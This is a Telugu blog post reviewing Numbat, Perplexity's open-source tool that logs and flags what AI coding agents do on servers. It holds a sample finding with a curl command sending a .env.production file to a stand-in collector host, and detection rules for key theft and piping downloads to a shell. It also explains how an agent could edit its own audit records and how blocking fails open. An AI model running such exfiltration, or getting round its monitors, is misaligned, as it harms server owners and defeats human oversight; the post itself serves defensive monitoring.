AI ఏజెంట్లు మీ సర్వర్లో ఏం చేస్తున్నాయో తెలుసుకోవడం ఎలా?
Perplexity విడుదల చేసిన Numbat టూల్ గురించి తెలుసుకోండి. ఇది మీ సర్వర్లో AI కోడింగ్ ఏజెంట్లు చేసే పనులను, SSH కీ యాక్సెస్ వంటి అనుమానాస్పద చర్యలను ఎలా పర్యవేక్షిస్తుందో ఇక్కడ చూడండి.
Numbat అంటే ఏమిటి
మీరు కలిగి ఉన్న మెషీన్పై AI ఏజెంట్ ఏమి చేసిందో తెలుసుకోవడానికి Numbat మీకు సహాయపడుతుంది. కోడింగ్ ఏజెంట్లు ఇప్పటికే రూపొందించే హుక్ కాల్బ్యాక్లు (hook callbacks) మరియు సెషన్ ఫైళ్లను ఇది చదువుతుంది. వాటిని ఒకే ఈవెంట్ ఫార్మాట్లోకి మారుస్తుంది. SSH ప్రైవేట్ కీని చదవడం లేదా డౌన్లోడ్ను నేరుగా షెల్లోకి పైప్ చేయడం వంటి ప్రవర్తనలను గుర్తించే నియమాలతో ఇది సరిపోల్చుతుంది. Perplexity దీనిని Apache 2.0 లైసెన్స్ కింద ఓపెన్ సోర్స్గా విడుదల చేసింది. దీని మొదటి ట్యాగ్ చేయబడిన వెర్షన్ 29 July 2026న విడుదలైంది.
కింద ఉన్న సమాచారం అంతా ప్రాజెక్ట్ రిపోజిటరీ మరియు దాని డాక్యుమెంటేషన్ నుండి సేకరించబడింది, దీనిని 2 August 2026న చదవడం జరిగింది. Perplexity ఏదైనా క్లెయిమ్ చేసినప్పుడు, ఈ పోస్ట్ దానిని పేర్కొంటుంది. ఇది ఇన్స్టాలేషన్ ట్యుటోరియల్ కాదు, ఎందుకంటే ఈ రిపోజిటరీ కొన్ని రోజుల క్రితమే ప్రారంభమైంది మరియు దీని కమాండ్లు మారే అవకాశం ఉంది.
సమస్య: ఏజెంట్ ఏమి చేసిందో ఎవరూ నమోదు చేయరు
మీ VPSలో పనిచేసే కోడింగ్ ఏజెంట్, మీరు అనుమతించిన యూజర్ తరపున షెల్ కమాండ్లను రన్ చేస్తుంది, ఫైళ్లను చదువుతుంది, ఫైళ్లను రాస్తుంది మరియు నెట్వర్క్ కనెక్షన్లను తెరుస్తుంది. ఏజెంట్ మీ షెల్లో టైప్ చేయదు కాబట్టి, మీ షెల్ హిస్టరీలో వీటిలో ఏవీ నమోదు కావు. sshd మీ లాగిన్ను మాత్రమే లాగ్ చేస్తుంది, ఆ తర్వాత మోడల్ తీసుకున్న నిర్ణయాలను ఏవీ నమోదు చేయదు. sudoని ఏదైనా సంప్రదిస్తే తప్ప /var/log/auth.log మౌనంగా ఉంటుంది. ఏజెంట్ తన స్వంత ట్రాన్స్క్రిప్ట్ను ఉంచుకుంటుంది, కానీ ఆ ఫైల్ ఏజెంట్ సెషన్ డైరెక్టరీలో ఉంటుంది, దాని ఫార్మాట్ విడుదలల (releases) మధ్య మారుతూ ఉంటుంది మరియు ఏజెంట్ ప్రాసెస్ స్వయంగా దానిని మార్చగలదు.
కాబట్టి, గత మంగళవారం ఏజెంట్ .env.productionని చదివిందా అని ఎవరైనా అడిగితే, చాలా సర్వర్లలో నిజాయితీగా చెప్పాలంటే మీరు దానిని గుర్తించలేరు. ఆ లోపం వల్లే ఈ ప్రాజెక్ట్ ఉనికిలోకి వచ్చింది.
Numbat గురించి Perplexity ఏమి చెబుతోంది
README ఈ సాధనాన్ని "AI ఏజెంట్ కార్యకలాపాలపై ఎండ్పాయింట్ విజిబిలిటీ, లోకల్ డిటెక్షన్, ఐచ్ఛిక ప్రీ-యాక్షన్ బ్లాకింగ్ మరియు ఫోరెన్సిక్ రీకన్స్ట్రక్షన్" అని వివరిస్తూ ప్రారంభమవుతుంది. ఇక్కడ ఎండ్పాయింట్ అంటే ఏజెంట్ రన్ అయ్యే మెషీన్ అని అర్థం, బయట నుండి పర్యవేక్షించే నెట్వర్క్ అప్లయెన్స్ కాదు. ఇవి వేర్వేరు సామర్థ్యాలు మరియు వీటికి వేర్వేరు ప్రాముఖ్యత ఉంటుంది.
డిటెక్షన్ పరికరంలోనే రన్ అవుతుంది. రూల్స్ CEL (common expression language)లో రాయబడతాయి మరియు స్థానికంగా మూల్యాంకనం చేయబడతాయి. వీటిపై మల్టీ-స్టెప్ సీక్వెన్స్ రూల్స్ ఉంటాయి మరియు YAMLలో మీ స్వంత రూల్స్ను జోడించుకునే సదుపాయం ఉంది. ఒక రూల్ ట్రిగ్గర్ కావడానికి ఏ సమాచారం మెషీన్ నుండి బయటకు వెళ్లాల్సిన అవసరం లేదు.
బ్లాకింగ్ అనేది ఐచ్ఛికం మరియు పరిమితమైనది. ఇది కేవలం సింక్రోనస్ ప్రీ-యాక్షన్ హుక్స్ ద్వారా మాత్రమే పనిచేస్తుంది, అది కూడా ఆ హుక్స్ను అందించే ఏజెంట్లలో మాత్రమే. మీరు దీన్ని ఆన్ చేసే వరకు ఇది ఆఫ్ లోనే ఉంటుంది.
రీకన్స్ట్రక్షన్ అనేది జరిగిన తర్వాత జరుగుతుంది. numbat scan ఒక ఏజెంట్ ఇప్పటికే డిస్క్లో రాసిన సెషన్ ఆర్టిఫాక్ట్లను పార్స్ చేస్తుంది, కాబట్టి మీరు ఏదైనా ఇన్స్టాల్ చేయకముందు జరిగిన కార్యకలాపాలను కూడా చూడవచ్చు. ఈ ప్రాజెక్ట్ ఆ క్లెయిమ్ను జాగ్రత్తగా పరిమితం చేస్తుంది: "ఎట్-రెస్ట్ రీకన్స్ట్రక్షన్ అనేది డిస్క్ లేదా మెమరీ అక్విజిషన్ కాదు మరియు ఏజెంట్ సేవ్ చేయని కార్యకలాపాలను ఇది తిరిగి పొందలేదు."
అవుట్పుట్ అనేది వెర్షన్ చేయబడిన NDJSON (newline delimited JSON). ఇది ఈవెంట్లు, ఫైండింగ్స్, ఎన్ఫోర్స్మెంట్ నిర్ణయాలు, ఇండికేటర్లు మరియు స్కాన్ సమ్మరీలను కవర్ చేస్తుంది. v0.1.2 వెర్షన్ నాటికి ఇది స్కీమా వెర్షన్ 0.2.0లో ఉంది. రికార్డులు stdoutకి లేదా లోకల్ ఫైల్కు వెళ్తాయి, మరియు ఐచ్ఛికంగా మీరు రన్ చేసే కలెక్టర్కు HTTP ద్వారా పంపబడతాయి. ఇది cgo లేకుండా బిల్డ్ చేయబడిన ఒకే స్టాటిక్ Go బైనరీగా వస్తుంది. ఇది macOS, Linux మరియు Windows లలో amd64 మరియు arm64 ఆర్కిటెక్చర్ల కోసం అందుబాటులో ఉంది. కాబట్టి, Linux VPSలో ఇది ఎటువంటి రన్టైమ్ ఇన్స్టాల్ చేయాల్సిన అవసరం లేని ఒకే ఒక ఫైల్.
Numbat ఏ ఏజెంట్లను చూడగలదు?
docs/agent-coverage.md లోని కవరేజ్ మ్యాట్రిక్స్ అధికారిక జాబితా, ఇది అన్నింటికీ సమానంగా ఉండదు. ఈ ప్రాజెక్ట్ దీనిని దాచకుండా స్పష్టంగా తెలియజేస్తుంది. Claude Code, Codex, Gemini CLI, Cursor మరియు GitHub Copilot CLI లలో ఆర్టిఫాక్ట్ స్కానింగ్ మరియు ప్రీ-యాక్షన్ హుక్తో కూడిన లైవ్ క్యాప్చర్ రెండూ ఉన్నాయి. OpenClaw వెర్షన్ 2026.7.1 నుండి నేటివ్ ప్లగిన్ను పొందుతుంది. చాలా ఎంట్రీలు 'deferred' (వాయిదా వేయబడినవి) గా గుర్తించబడ్డాయి, అంటే లైవ్ హుక్ పాత్ అందుబాటులో ఉన్నప్పటికీ ఆర్టిఫాక్ట్ పార్సర్ లేదు. ఏజెంట్ రన్ అవుతున్నప్పుడు చదవడం సురక్షితం కాని రైట్-అహెడ్ లాగ్తో కూడిన SQLite లో ఆ ఏజెంట్ తన హిస్టరీని నిల్వ చేయడం దీనికి ప్రధాన కారణం. 2 ఆగస్టు 2026న మ్యాట్రిక్స్ను పరిశీలించినప్పుడు OpenCode మరియు Cline ఈ విభాగంలో ఉన్నాయి.
ఈ టూల్తో ఏదైనా ప్లాన్ చేసే ముందు మీ ఏజెంట్ కోసం ఉన్న అడ్డు వరుసను (row) తనిఖీ చేయండి, ఎందుకంటే "supported" (మద్దతు ఉన్న) అనే పదానికి ప్రతి వరుసలోనూ వేర్వేరు అర్థాలు ఉండవచ్చు.
డిటెక్షన్ ఎలా కనిపిస్తుంది
రూల్స్కు వాటి ఉద్దేశ్యాన్ని తెలిపే ఐడిలు ఉంటాయి. secrets.read_private_key అనేది SSH కీ, AWS క్రెడెన్షియల్స్, kube config లేదా ప్యాకేజీ రిజిస్ట్రీ లాగిన్ను కవర్ చేస్తుంది. curl లేదా wget అవుట్పుట్ను ఇంటర్ప్రెటర్లోకి పైప్ చేసినప్పుడు exec.download_pipe_shell ట్రిగ్గర్ అవుతుంది. sudo, doas, su లేదా pkexec ద్వారా ఇంటరాక్టివ్ root షెల్ కోసం వచ్చే అభ్యర్థనలను privilege.elevated_shell గుర్తిస్తుంది. తెలిసిన మైనర్ బైనరీలు మరియు ఇమేజ్ పేర్లతో impact.cryptomining_launch సరిపోలుతుంది.
సీక్వెన్స్ రూల్స్ ఒకే సెషన్లో జరిగే ఈవెంట్లను కలుపుతాయి. chain.secret_read_then_egressకి ఒక సీక్రెట్ ఫైల్ను చదవడం, ఆ తర్వాత డేటాను బయటకు పంపే కమాండ్ను అమలు చేయడం అవసరం. README ఫైల్, రెండు Claude Code ప్రీ-యాక్షన్ కాల్బ్యాక్ల నియంత్రిత రీప్లే నుండి సేకరించిన ఈ కింది ఫలితాన్ని ప్రచురిస్తుంది, ఇది లైవ్ ఇన్సిడెంట్ నుండి తీసుకున్నది కాదు. ఇక్కడ ముఖ్యమైన ఫీల్డ్లను మాత్రమే ఉంచి మిగిలినవి తొలగించబడ్డాయి:
{
"record_type": "finding",
"rule_id": "chain.secret_read_then_egress",
"rule_version": "1.4",
"severity": "high",
"confidence": "medium",
"title": "Secret-file access followed by data-bearing egress",
"observed_command": "curl --data-binary @/workspace/acme-api/.env.production https://collector.example.invalid/ingest",
"source_agent": "claude-code",
"source_type": "hook",
"tags": ["attack.t1048", "attack.t1552", "attack.t1567"]
}రికార్డులో ఉన్న "confidence": "medium"ని గమనించండి, మరియు ఈ రకమైన అవుట్పుట్ మొత్తం గురించి ప్రాజెక్ట్ ఏమి చెబుతుందో గమనించండి: "ఫైండింగ్స్ అనేవి రూల్ మ్యాచ్లు మాత్రమే, అవి రాజీ (compromise) జరిగినట్లు రుజువు కాదు." ఒక కీని చదివి, ఆపై బిల్డ్ ఆర్టిఫాక్ట్ను అప్లోడ్ చేసే డిప్లాయ్ స్క్రిప్ట్ అదే సీక్వెన్స్ రూల్తో మ్యాచ్ అవుతుంది. మ్యాచ్ సరైనదే, కానీ అలారం తప్పు; మీరు ఇప్పటివరకు రన్ చేసిన ప్రతి డిటెక్షన్ టూల్లో ఇది సాధారణ స్థితి.
బ్లాకింగ్ డిఫాల్ట్గా ఆఫ్లో ఉంటుంది మరియు ఇది ఫెయిల్-ఓపెన్ పద్ధతిలో పనిచేస్తుంది
Numbat అందించే ప్రతి నియమం కేవలం మానిటర్ చేయడానికి మాత్రమే ఉంటుంది. ఒక నియమాన్ని బ్లాక్ చేసేలా మార్చడం అనేది ఉద్దేశపూర్వకమైన పని: ఆ నియమం యొక్క పూర్తి YAMLని మీ స్వంత డైరెక్టరీలోకి కాపీ చేయండి, అదే idని ఉంచండి, enforce: trueని జోడించండి, వెర్షన్ను పెంచండి, ఆపై ఆ పాలసీని ధృవీకరించి ఇన్స్టాల్ చేయండి.
numbat rules check --rules-dir ./numbat-policy
numbat hook install --agent codex --emit all \
--rules-dir ./numbat-policy --enforceఇప్పుడు మీరు దీనిని ఎంతవరకు నమ్మవచ్చో నిర్ణయించే అంశం. Numbat యొక్క deny అనేది ఏజెంట్కు తిరిగి పంపబడే ఒక ప్రతిస్పందన, మరియు ఆ ఏజెంట్ మాత్రమే టూల్ కాల్ను తిరస్కరిస్తుంది. Numbat స్వయంగా ఏదైనా సమస్యను ఎదుర్కొన్నప్పుడు ఏమి జరుగుతుందో ఎన్ఫోర్స్మెంట్ గైడ్ స్పష్టంగా చెబుతోంది: "తప్పుగా ఉన్న పేలోడ్లు, సంబంధిత మూల్యాంకన లోపాలు, పానిక్స్ మరియు అవుట్పుట్ వైఫల్యాలు numbat denyని నిలిపివేస్తాయి." హుక్ ఇన్పుట్ 4 MiBకి పరిమితం చేయబడింది, మరియు పరిమితికి మించిన ఇన్పుట్ కూడా అదే మార్గాన్ని అనుసరిస్తుంది.
ఒక deny అమలులోకి వచ్చినప్పుడు దాని పరిమితి గురించి కూడా గైడ్ స్పష్టంగా ఉంది: "ఫెయిల్-ఓపెన్ అంటే numbat తన deny ప్రతిస్పందనను నిలిపివేస్తుంది. టూల్ ఖచ్చితంగా అమలు అవుతుందని ఇది హామీ ఇవ్వదు: హోస్ట్ ఇప్పటికీ ప్రాంప్ట్ చేయవచ్చు, తిరస్కరించవచ్చు, టైమ్ అవుట్ అవ్వవచ్చు లేదా మరొక హుక్ లేదా పాలసీని వర్తింపజేయవచ్చు."
కాబట్టి ఇక్కడ ఎన్ఫోర్స్మెంట్ అనేది ఒక గార్డ్రైల్ మాత్రమే, సరిహద్దు కాదు. ప్రాసెస్ క్రాష్ అయితే, Numbat ఆ చర్యను బ్లాక్ చేయదు, ఎందుకంటే ఏదైనా సమస్య వచ్చినప్పుడు మీ ఏజెంట్ను స్తంభింపజేసే మానిటర్ను ఎవరూ ఉంచుకోరు. ఈ రాజీ సమంజసమైనదే. కాబట్టి, deny ఎల్లప్పుడూ అందుతుందని భావించే భద్రతా నమూనాను నిర్మించవద్దు.
Numbat మీరు ఇప్పటికే చేస్తున్న పనులకు ఎలా సరిపోతుంది
Numbat ఎండ్పాయింట్లో, ఏజెంట్ యొక్క స్వంత ప్రాసెస్ ట్రీ లోపల రన్ అవుతుంది మరియు డిఫాల్ట్గా ~/.numbat/records.ndjson కి వ్రాస్తుంది. మీ యూజర్గా రన్ అవుతున్న ఏజెంట్ ఆ ఫైల్ను చదవగలదు. అది దానిని ఎడిట్ కూడా చేయగలదు. ఆడిట్ ట్రైల్ విలువ దాని చుట్టూ ఉన్న ఐసోలేషన్ (వేర్పాటు) మీద ఆధారపడి ఉంటుంది, కాబట్టి మీరు ఇప్పటికే కలిగి ఉన్న ప్రతి కంట్రోల్ను దీనికి ముందు ఉంచాలి, వెనుక కాదు.
కోడింగ్ ఏజెంట్కు డిస్పోజబుల్ VMని అందించడం అనేది ఒక తప్పుడు రన్ దేనిని చేరుకోగలదో దానిని పరిమితం చేస్తుంది. VPSలో లీస్ట్ ప్రివిలేజ్ యూజర్ ఏజెంట్ను అది తెరవకూడని ఫైళ్ల జోలికి వెళ్లకుండా ఉంచుతుంది. ఏజెంట్ కాంటెక్స్ట్ నుండి క్రెడెన్షియల్స్ను దూరంగా ఉంచడం వల్ల secrets.read_private_key మ్యాచ్ అరుదుగా జరుగుతుంది, కాబట్టి అది జరిగినప్పుడు పరిశీలించడం విలువైనదిగా ఉంటుంది. మరియు VPSలో Claude Code కోసం మీరు సెటప్ చేసిన శాండ్బాక్స్ ఇప్పటికీ కంటైన్మెంట్ను చేసే ప్రధాన అంశం.
Numbat జోడించేది రికార్డు మాత్రమే, కాబట్టి ఆ రికార్డును ఏజెంట్ చేరుకోలేని చోటికి పంపండి. numbat ship మరియు HTTP సింక్ ఆ పని కోసమే ఉన్నాయి. రెండవ మెషీన్లో స్ట్రీమ్ యొక్క కాపీ ఉండటం అనేది లాగ్ ఫైల్కు మరియు సాక్ష్యానికి మధ్య ఉన్న వ్యత్యాసం. ఈ ఈవెంట్ మోడల్ MCP (మోడల్ కాంటెక్స్ట్ ప్రోటోకాల్) ఫీల్డ్లను కూడా కలిగి ఉంటుంది, కాబట్టి మీరు VPSలో హోస్ట్ చేసే MCP సర్వర్ ద్వారా వెళ్లే టూల్ కాల్స్, లోకల్ షెల్ కమాండ్స్ ఉన్న అదే స్ట్రీమ్లోకి చేరుతాయి. ఇది చాలా ముఖ్యం, ఎందుకంటే bashని మాత్రమే గమనించే దేనికైనా ఆ మార్గం కనిపించదు.
మొదట రీడ్-ఓన్లీ (read-only) పద్ధతిలో ప్రయత్నించండి
పిన్ చేసిన వెర్షన్ను ఇన్స్టాల్ చేయండి. go install కోసం Go 1.26.5 లేదా అంతకంటే కొత్త వెర్షన్ అవసరం. మీరు సోర్స్ నుండి బిల్డ్ చేయకూడదనుకుంటే, రిలీజెస్ పేజీలో SHA-256 చెక్సమ్లతో కూడిన ప్రీ-బిల్ట్ బైనరీలు అందుబాటులో ఉంటాయి.
go install github.com/perplexityai/numbat/cmd/numbat@v0.1.2
numbat agents
numbat scannumbat agents బాక్స్లో ఇన్స్టాల్ చేయబడిన ఏజెంట్లను గుర్తిస్తుంది. numbat scan డిస్క్లో ఇప్పటికే ఉన్న సెషన్ ఆర్టిఫాక్ట్లను పార్స్ చేసి రికార్డులను ప్రింట్ చేస్తుంది. ఈ కమాండ్లు "హుక్స్ను ఇన్స్టాల్ చేయవు లేదా ఏజెంట్ కాన్ఫిగరేషన్ను మార్చవు" అని README పేర్కొంది. అలాగే, numbat "ఆర్టిఫాక్ట్లలో కనిపించే ఏజెంట్లను లేదా కమాండ్లను ఎప్పుడూ ఎగ్జిక్యూట్ చేయదు, మరియు ఇది కాన్ఫిగర్ చేయబడిన HTTP సింక్లకు మాత్రమే అవుట్బౌండ్ అభ్యర్థనలను పంపుతుంది". స్కానింగ్ అనేది రీడ్-ఓన్లీ పద్ధతిలో జరుగుతుంది మరియు రహస్య సమాచారాన్ని తొలగిస్తుంది (redaction), సాధారణ రికార్డ్ అవుట్పుట్లో ఎప్పుడూ పూర్తి స్థాయి రా ట్రాన్స్క్రిప్ట్ ఉండదు.
లైవ్ క్యాప్చర్ అనేది తదుపరి దశ, ఇది ఏజెంట్ కాన్ఫిగరేషన్ను మారుస్తుంది:
numbat hook install --agent codex --emit all
numbat hook status --agent codex--emit all ఈవెంట్లు, ఫైండింగ్లు, ఇండికేటర్లు మరియు వర్తించే ఎన్ఫోర్స్మెంట్ నిర్ణయాలను ~/.numbat/records.ndjson కి వ్రాస్తుంది. ప్రాజెక్ట్ నుండి నేరుగా రెండు హెచ్చరికలు ఉన్నాయి. హుక్స్ రన్ అవ్వడానికి ముందు ఏజెంట్ లోపల వాటిని విశ్వసించాల్సి రావచ్చు, మరియు --enforce వంటి ఫ్లాగ్లను మార్చిన తర్వాత ఆ నమ్మకాన్ని మళ్ళీ సమీక్షించాలి. మరియు hook status "ఎగ్జిక్యూషన్ లేదా డెలివరీని కాకుండా, కాన్ఫిగరేషన్ను మాత్రమే ధృవీకరిస్తుంది", కాబట్టి హెల్తీ స్టేటస్ లైన్ ఉందంటే రికార్డులు ఎక్కడికైనా చేరుతున్నాయని అర్థం కాదు.
ఈ కొత్త రిపోజిటరీ ఎందుకు డిపెండెన్సీ కాదు
పబ్లిక్ రిలీజ్లు 29 జూలై 2026న v0.1.1 మరియు 1 ఆగస్టు 2026న v0.1.2. ఈ పోస్ట్ 2 ఆగస్టు 2026న రాసినప్పుడు రిపోజిటరీకి 597 స్టార్స్ ఉన్నాయి. ఇంత వేగంగా పెరిగే సంఖ్యలు కోడ్ నాణ్యతను కాకుండా, Perplexity యొక్క ఆడియన్స్ను ప్రతిబింబిస్తాయి. ఒక స్టార్ అంటే ఎవరో ఆ పేజీని తర్వాత చూడటానికి సేవ్ చేసుకున్నారని అర్థం.
ఈ వెర్షన్ నంబర్, ఇది ఏ దశలో ఉందో స్పష్టంగా తెలియజేస్తుంది. v0.1.2 నోట్స్ ప్రధానంగా క్రెడెన్షియల్ రిడక్షన్ ఫిక్స్లు, అలాగే కేస్ బండిల్ మరియు టెలిమెట్రీ నార్మలైజేషన్ పనులకు సంబంధించినవి. ఇతర ప్రోగ్రామ్ల ట్రాన్స్క్రిప్ట్లను సురక్షితంగా చదవడం దీని పని. అటువంటి టూల్లో రిడక్షన్ బగ్లు ఉండటం ప్రారంభ దశలో సహజం. ఇన్పుట్లు పన్నెండు వేర్వేరు ఏజెంట్ల నుండి వస్తాయి మరియు ప్రతి ఏజెంట్ తమ ఫార్మాట్ను సొంత షెడ్యూల్లో మారుస్తుంది కాబట్టి, మరిన్ని బగ్లు వచ్చే అవకాశం ఉంది.
దీని నుండి రెండు ఆచరణాత్మక నియమాలు అనుసరించాలి. మీరు ఉంచే దేనిలోనైనా @latest ని కాకుండా, ట్యాగ్ను పిన్ చేయండి. రికార్డ్ స్కీమా స్థిరపడే వరకు, దీనిని మీరు డిపెండ్ అయ్యే కంట్రోల్గా కాకుండా, మీరు మూల్యాంకనం చేస్తున్న ఒక పరికరంగా పరిగణించండి.
FAQ
Numbat ప్రమాదకరమైన AI ఏజెంట్ కమాండ్లను నిరోధిస్తుందా?
మీరు ఎంచుకుంటే మాత్రమే, మరియు అది కూడా ఉత్తమ ప్రయత్నం (best effort) ప్రాతిపదికన మాత్రమే. Numbat విడుదల చేసే ప్రతి నియమం కేవలం పర్యవేక్షణ (monitor) కోసం మాత్రమే ఉంటుంది. నిరోధించడానికి, మీరు ఆ నియమం యొక్క YAMLని మీ స్వంత డైరెక్టరీలోకి కాపీ చేసి, దాని idని అలాగే ఉంచి, enforce: trueని జోడించి, వెర్షన్ను పెంచి, --enforceతో హుక్ను ఇన్స్టాల్ చేయాలి. అప్పుడు కూడా, ఆ నిరాకరణ (deny) అనేది ఏజెంట్కు తిరిగి పంపబడే ఒక ప్రతిస్పందన మాత్రమే, మరియు ఆ కాల్ను తిరస్కరించేది ఏజెంట్ మాత్రమే. ఈ ప్రాజెక్ట్ డాక్యుమెంటేషన్ 'fail-open' ప్రవర్తనను వివరిస్తుంది: తప్పుగా ఉన్న పేలోడ్లు, మూల్యాంకన లోపాలు, పానిక్స్ మరియు అవుట్పుట్ వైఫల్యాలు అన్నీ నిరాకరణను నిలిపివేస్తాయి. దీన్ని ఒక రక్షణ కవచంగా (guardrail) ఉపయోగించండి, మీ ఏకైక భద్రతా సరిహద్దుగా కాదు.
Numbat ఏ AI ఏజెంట్లకు మద్దతు ఇస్తుంది?
ఏజెంట్ను బట్టి కవరేజ్ మారుతూ ఉంటుంది మరియు అది రిపోజిటరీలోని docs/agent-coverage.mdలో జాబితా చేయబడింది. 2 ఆగస్టు 2026న ఆ పేజీని చదివినప్పుడు, Claude Code, Codex, Gemini CLI, Cursor మరియు GitHub Copilot CLI రెండింటికీ ఆర్టిఫాక్ట్ స్కానింగ్ మరియు లైవ్ క్యాప్చర్ సౌకర్యం ఉంది, మరియు OpenClaw వెర్షన్ 2026.7.1 నుండి నేటివ్ ప్లగిన్ను కలిగి ఉంది. అనేక ఇతర ఏజెంట్లు లైవ్ హుక్ పాత్తో జాబితా చేయబడ్డాయి, కానీ వాటికి ఇంకా ఆర్టిఫాక్ట్ పార్సర్ లేదు. సాధారణంగా వాటి సెషన్ హిస్టరీ ఒక SQLite డేటాబేస్లో ఉండటం వల్ల, ఏజెంట్ రన్ అవుతున్నప్పుడు దాన్ని చదవడం సురక్షితం కాదు. మీ ఏజెంట్ కోసం ఉన్న అడ్డు వరుసను (row) చదవండి, ఎందుకంటే "supported" అనే పదం అక్కడ వివిధ స్థాయిల మద్దతును సూచిస్తుంది.
ఏజెంట్ Numbat రికార్డులను మార్చగలదా?
అవును, అది అదే యూజర్ ఖాతాతో రన్ అయితే మార్చగలదు. రికార్డులు డిఫాల్ట్గా ఏజెంట్ ఉన్న అదే మెషీన్లో ~/.numbat/records.ndjson వద్ద ఉంటాయి, కాబట్టి ఆ పాత్కు రైట్ యాక్సెస్ ఉన్న ఏదైనా ఏజెంట్ వాటిని మార్చగలదు లేదా తొలగించగలదు. numbat ship లేదా HTTP సింక్ ఉపయోగించి ఆ స్ట్రీమ్ను ఏజెంట్ చేరుకోలేని కలెక్టర్కు పంపండి, మరియు స్థానిక ఫైల్ను కేవలం సౌకర్యం కోసం ఒక కాపీగా ఉంచుకోండి. అందుకే ఈ సాధనం ఐసోలేషన్కు ప్రత్యామ్నాయం కాదు, దానికి అదనపు భద్రత మాత్రమే. తక్కువ ప్రివిలేజ్ ఉన్న యూజర్ కింద ఒక డిస్పోజబుల్ VMలో పరిమితం చేయబడిన ఏజెంట్కు, తన స్వంత ఆడిట్ ట్రైల్పై చాలా తక్కువ నియంత్రణ ఉంటుంది.
Numbat ప్రొడక్షన్ సర్వర్కు సిద్ధంగా ఉందా?
మీరు ఆధారపడే ఒక నియంత్రణ సాధనంగా ఇది ఇంకా సిద్ధంగా లేదు. దీని మొదటి పబ్లిక్ రిలీజ్ v0.1.1, 29 జూలై 2026న జరిగింది మరియు v0.1.2, 1 ఆగస్టు 2026న విడుదలైంది, కాబట్టి ఫ్లాగ్లు మరియు రికార్డ్ స్కీమా రెండూ ఇంకా మారుతూనే ఉన్నాయి. ఒక బాక్స్పై numbat agents మరియు numbat scan రన్ చేయడం అనేది కేవలం రీడ్-ఓన్లీ మరియు తక్కువ ప్రమాదకరమైనది, ఇది మీ ఏజెంట్లు డిస్క్పై ఏమి వదిలిపెడుతున్నాయో మీకు తెలియజేస్తుంది. ముఖ్యమైన సర్వర్పై ఎన్ఫోర్స్మెంట్ హుక్స్ను ఇన్స్టాల్ చేయడం అనేది వేరే నిర్ణయం, దీనికి పిన్ చేసిన ట్యాగ్ మరియు హుక్ సరిగ్గా పనిచేయనప్పుడు తీసుకోవాల్సిన చర్యలపై ఒక ప్రణాళిక అవసరం.